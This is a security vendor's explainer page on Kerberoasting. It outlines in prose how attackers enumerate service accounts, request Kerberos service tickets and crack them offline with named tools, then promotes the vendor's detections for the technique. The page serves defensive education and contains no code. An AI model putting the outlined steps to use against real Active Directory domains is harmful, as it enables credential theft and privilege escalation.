Uncover gaps in your Microsoft Identity Security.
Book an identity exposure gap analysis today.
Vectra AI Japan、ITR発行の最新レポート内「NDR市場」にて国内トップシェアを獲得
詳細を見る
Hamburger icon top line
Hamburger icon middle line
Hamburger icon bottom line
Attack Technique

Kerberoasting

The Kerberos protocol reduces your risk of reused and unsecure passwords, but can expose you to Kerberoasting attacks. Here’s what you need to know about this common attack technique.

Definition
How it works
Why attackers use it
Detection
FAQs
Definition

What is Kerberoasting?

Kerberoasting is an attack technique that targets the Kerberos — an authentication protocol that uses symmetric key cryptography and a key distribution center (KDC) to verify user identities.

Kerberoasting attacks start when an authenticated domain user requests a service ticket for a service principal name (SPN), which serves as a unique identifier.

The attacker extracts the service ticket, which is encrypted with the hash of the affiliated service account password. They then attempt to crack the plaintext password.

How it works

How Kerberoasting works?

Kerberoasting attacks work by exploiting the ticket-granting ticket (TGT) authentication token issued by the KDC, which is used to request access tokens from the Kerberos ticket-granting service (TGS). Put simply: The Kerberos protocol lets you authenticate domain user accounts without having to ask people to constantly re-enter or store passwords — and attackers have specialized tools to exploit it. They do this by:

  1. Enumerating service accounts: The attacker, already possessing a foothold in the network, enumerates service accounts. These are typically accounts with SPNs registered in Active Directory.
  2. Requesting tickets: The attacker requests a service ticket (TGS) for the identified service accounts.
  3. Ticket Granting:The domain controller issues a Ticket Granting Service (TGS) ticket encrypted with the service account's password hash.
  4. Extracting encrypted tickets: The Kerberos protocol returns an encrypted ticket, which includes data encrypted with the service account’s NTLM hash.
  5. Offline Cracking: The attacker uses tools like John the Ripper or Hashcat to crack the password hash and reveal the plaintext passwords.

The Kerberoasting process
Why attackers use it

Why attackers use Kerberoasting

Attackers use Kerberoasting as a technique to obtain the hashed passwords of service accounts within a Microsoft Active Directory environment. By exploiting how Kerberos authentication works, attackers can extract these password hashes and attempt to crack them offline. Successfully cracking these hashes can grant attackers elevated privileges, enabling them to move laterally within the network, access sensitive data, or further compromise the system.

Here are the reasons why attackers use Kerberoasting:

Privilege Escalation

  • Access to High-Privilege Accounts: Service accounts often have elevated permissions. Gaining their credentials allows attackers to perform actions that require higher privileges.
  • Lateral Movement: With access to service accounts, attackers can move across different systems within the network, expanding their reach.

Stealthy Exploitation

  • Low Detection Risk: Kerberoasting can be executed by any authenticated domain user without triggering immediate security alerts because requesting service tickets is standard behavior.
  • Offline Password Cracking: Since the password cracking happens offline, it avoids detection by network monitoring tools.

Exploitation of Weak Security Practices

  • Weak or Unchanged Passwords: Service account passwords are often weak or not changed regularly, making them susceptible to cracking.
  • Misconfigurations: Improperly configured accounts and permissions can make Kerberoasting attacks easier to perform.

No Special Privileges Needed

  • Accessible by Regular Users: Any user with domain access can request service tickets, making it a widely accessible attack vector.
  • Bypassing Network Restrictions: Attackers do not need direct access to the domain controller or sensitive servers to perform Kerberoasting.
Platform Detections

How to detect Kerberoasting attacks

To protect your organization against Kerberoasting attacks, early detection is key. In addition to monitoring for unusual Kerberos traffic patterns and ticket requests, use behavior-based detections to identify anomalies in the actual requests. 

Vectra AI provides two types of Kerberoasting detections: 

  • The SPN Sweep detection focuses on identifying attempts to enumerate Service Principal Names (SPNs) within your Active Directory environment. This shows you when attackers might be gathering information about service accounts they can target.
  • The Cipher Downgrade detection looks for attempts to request Kerberos tickets using weaker encryption types, such as RC4 encryption. This shows you when attackers are likely manipulating the system to generate tickets that are easier to crack.

The Account Scan detection identifies attempts to query the Kerberos authentication service for valid user accounts — a common precursor to Kerberoasting.

Detection
Kerberoasting: SPN Sweep
Learn more
Detection
Kerberoasting: Weak Cipher Request
Learn more
Detection
Kerberoasting: Targeted Weak Cipher Response
Learn more
Detection
Kerberos Brute-Sweep
Learn more
Explore all detections

Protect your network with advanced detections

Kerberoasting is one of dozens of advanced AI-driven detections available in the Vectra AI Platform, which covers 90% of relevant MITRE ATT&CK techniques.

Explore the Platform
Learn more

FAQs